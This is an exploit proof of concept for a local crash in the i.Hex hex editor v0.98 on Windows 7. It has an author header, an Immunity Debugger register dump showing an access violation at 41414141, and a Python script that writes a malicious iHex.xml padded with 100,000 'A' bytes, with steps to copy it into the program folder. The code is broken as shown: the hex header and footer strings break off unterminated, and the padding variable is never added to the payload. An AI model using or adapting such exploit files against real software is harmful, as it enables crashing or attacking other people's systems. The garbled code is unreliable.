#Exploit Title:i.Hex Local Crash Poc
#Software Link:www.memecode.com/data/
#Version:i.Hex-v0.98 (Win32 Release)
#Description:i.Hex is a small and free graphical Hex Editor for Windows..
#Tested on:Win7 32bit
#Exploit Author:metacom --> twitter.com/m3tac0m
Immunity Debugger Log data
EAX 0135B8F8 ASCII "
ECX 41414141
EDX 41414141
EBX 01363FA0
ESP 0012F6D8
EBP 0012F700
ESI 0135B8F0
EDI 005F0000
EIP 77B85FBD ntdll.77B85FBD
Press Shift+9
Log data, item 0
Message=[15:56:05] Access violation when reading [41414141]
print "\n[*]Vulnerable Created iHex.xml!"
print "[*]Copy iHex.xml to C:\Program Files\Memecode\i.Hex"
print "[*]Start i.Hex"
print "[*]--------------------------
poc="\x41" * 100000
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\
header += "\x55\x54\x46\x2d\x38\x22\x20\
header += "\x20\x4c\x69\x74\x74\x6c\x65\
footer = "\x22\x0a\x09\x20\x50\x6f\x73\
footer += "\x72\x75\x20\x49\x74\x65\x6d\
footer += "\x4f\x70\x74\x69\x6f\x6e\x73\
payload= header + footer
# Write out our malicious file
writeFile = open ("iHex.xml", "wb")
writeFile.write( payload )
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